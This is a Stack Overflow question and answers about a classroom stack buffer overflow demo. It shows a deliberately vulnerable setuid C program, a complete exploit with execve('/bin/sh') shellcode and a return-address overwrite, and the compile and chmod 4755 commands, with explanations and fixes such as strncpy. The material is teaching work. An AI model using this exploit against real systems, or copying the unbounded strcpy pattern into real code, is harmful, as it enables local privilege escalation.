# Buffer overflow implementation

Tags: c, linux, buffer-overflow

My professor uploaded an example of buffer overflow for us, but didn't really explain it very well. Basically, he takes advantage of a buffer overflow to generate a shell that has root privileges. I was hoping someone would be able to explain to me exactly what is happening in his example code. He uses two C files, the first one is the vulnerable program.

```
    /* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
//stack.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
    char buffer[12];
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}
```

The second code is the exploit.

```
/* A program that creates a file containing code for launching shell*/
//exploit.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define DEFAULT_OFFSET 350

char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;

unsigned int get_sp(void)
{
    __asm__("movl %esp,%eax");
}

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    char *ptr;
    long *a_ptr;
    int ret;

    int offset = DEFAULT_OFFSET;
    int codeSize = sizeof(shellcode);
    int buffSize = sizeof(buffer);

    if(argc > 1) offset = atoi(argv[1]);

    ptr = buffer;
    a_ptr = (long *) ptr;

    memset(buffer, 0x90, buffSize);

    ret = get_sp() + offset;
    printf("Return Address: 0x%x\n", get_sp());
    printf("Address: 0x%x\n", ret);

    ptr = buffer;
    a_ptr = (long *) ptr;

    int i;
    for(i = 0; i < 300; i += 4)
    {
        *(a_ptr++) = ret;
    }

    for(i = 486; i < codeSize + 486; ++i)
    {
        buffer[i] = shellcode[i-486];
    }

    buffer[buffSize-1] = '\0';

    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
```

He then uses these commands from command line

```
$ su root
$ Password (enter root password)
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
$ gcc -o exploit exploit.c
$./exploit
$./stack
```

I tested it on our Ubuntu VM we have set up for the class and it gets root access, but I just don't understand how. He also asked us to think about how we could improve the code and any suggestions would be welcomed!

Comment: ask your professor - its his job to explain it really well to you.

Comment: http://phrack.org/issues/49/14.html

Comment: I'm not sure how exactly it's meant to get root access, but I compiled it and both the programs just give a segfault.

Comment: @MightyPork the vulnerable program is suid. The exploit overwrites the return address of the `bof` function and make it point to a buffer with a small binary code that spawns a shell: when the `bof` function returns: kab00m, r00ted!

Comment: It will give a root access only if the process running the vulnerable program has it.

Comment: @pm100 OP did run the program, did read the source and made some effort. And he asks for an explanation of how/why it works. To me, it looks like a valid question, clearly defined, and a pretty interesting one (I might be mistaken though ;)). Sure, professor should explain that. But that doesn't mean we aren't supposed to, when asked. Two different explanations are better than one! Especially when some of the SO users out here are better than most professors ;)

Comment: i am not saying its not a valid question - just pointing out that it is the professors job to explain it. I agree it is interesting to work it out

Comment: Here's a tool (our "CheckPointer") that detects erroneous execution in compiled C programs: http://www.semanticdesigns.com/Products/MemorySafety/  It should be able to diagnose where the main program fails, as it runs.  By examining the failure, you should be able to decide why the main program is exploitable.  CheckPointer is a commercial tool, but it will operate in evaluation mode on programs this size, just fine.

Comment: ... if the professor asked *you* to explain it, it isn't his job.  Its yours to work out why.  Presumably he thinks you have the skills to do it, if you apply them studiously enough.

Comment: Anyone skilled in this kind of thing might be interested in joining a team competing for $2 Million - the catch is you have to write software that detects these attacks automatically, patches itself automatically, and notifies other computers on the network of the patch - http://www.cybergrandchallenge.com/

Comment: @amdn: that's not "skilled" at this; that's a holy grail (e.g., coming up with a theory of relativity).   Or they wouldn't be offering that kind of money.

Comment: @IraBaxter that's what I thought also, which is why I decided I had better things to do with my time :-)

Comment: @amdn: You're in Austin? Check out http://www.semdesigns.com/products/parlanse/index.html

Comment: @IraBaxter thanks, yes I'm in Austin... that's impressive technology, I liked the quote "oxygen tanks are pretty different than hiking boots" LOL, yes, yes they are.

Answer (score 4, accepted):

I'm not a exploit expert for sure, but that's how I understand it (hope that helps):

**Exploited program**

The following two lines have an issue, because you're trying to copy a buffer which has 517 bytes into a buffer which has 12 bytes capacity. `strcpy` isn't smart enough to stop writing to `buffer` after 12 bytes, so it'll write to some place in memory, overriding anyting that was there.

```
char buffer[12];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
```

Since your program is running with root privileges, anything wrote in the memory could be run with same privileges.

**Exploit program**

Exploit contains an assembly code which is capable of spawning a new shell instance. This code will be written to the `badfile`, at the location after the first 12 bytes. That's because first 12 bytes fit into the buffer in the attacked program. This file is later read to this buffer, and then copied to the (to small) `str` buffer, which means than anything other than first 12 bytes, will be placed somewhere in the memory of the (root privileged) exploited program.

```
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
```

Lastly, what the exploit does, it pushes the injected code in the stack, and rewrites return address so the injected code will get executed. As suggested by @artless noise in the comment, this is being done here:

```
for(i = 0; i < 300; i += 4)
{
    *(a_ptr++) = ret;
}
```

For an explanation on how the stack looks like, see [this article](http://en.wikipedia.org/wiki/Stack_buffer_overflow#Exploiting_stack_buffer_overflows) and the helpful diagrams there.

Of course, all that is possible, because the attacked program is run with root privileges. That's because you've run this command as root:

```
# chmod 4755 stack
```

The first number, `4`, means that this file (`stack` binary) will be called with the privileges of the user who owns this file, not the user who is calling it (which is the default behaviour). This is called a setuuid. Without that, attacker would be able to gain privileges of the user who launched `stack`, who would have lower privileges than root.

As a sidenote, that's precisely why it's highly advisable not to run any deamons as root (i.e. HTTP servers). The buffer overflow vulnerability can always be discovered, even in the best, most secure codebases. Running program as a regular user makes it harded for an attacker to do a real harm.

Comment: You are missing one important point.  See: `for(i = 0; i < 300; i += 4)`.  The code needs to over-write the return address on the stack frame.  This is the code that does it.  It puts the return address to the shell code.  Otherwise, I believe your answer has everything for this **stackoverflow**.  The OP should know what a [stack frame is](http://eli.thegreenplace.net/2011/02/04/where-the-top-of-the-stack-is-on-x86/).  All local variables are on the stack **along with a return address**; that is what makes the exploit work.  Data becomes code.

Comment: Some architectures have [no execute](http://en.wikipedia.org/wiki/NX_bit#Linux), but then you can use [ROP](http://en.wikipedia.org/wiki/Return-oriented_programming); better not to have the bug.

Comment: @artlessnoise thanks for this tip - as I said, I'm no expert on that, just hoping OP will get the help he/she seeks for here - because it'd be a shame if the question about stack overflow did't get an answer on stack overflow ;) Also, agreed that it's better not to have a bug, but no software is perfect (well, obviously besides the one I write ;)), and running code as root is asking for trouble.

Answer (score -3):

@kamituel provided a good explanation of how the exploit works, and hints at how to make the code better

> `strcpy` isn't smart enough to stop writing to `buffer` after 12 bytes, ...

The way that this is corrected is by using [`strncpy`](http://pubs.opengroup.org/onlinepubs/009695399/functions/strncpy.html).  This function behaves just like strcpy ***except*** it limits how many bytes can be copied.  Thus you can prevent the buffer overflow attack by limiting the copy to the 12 bytes you have available in the buffer.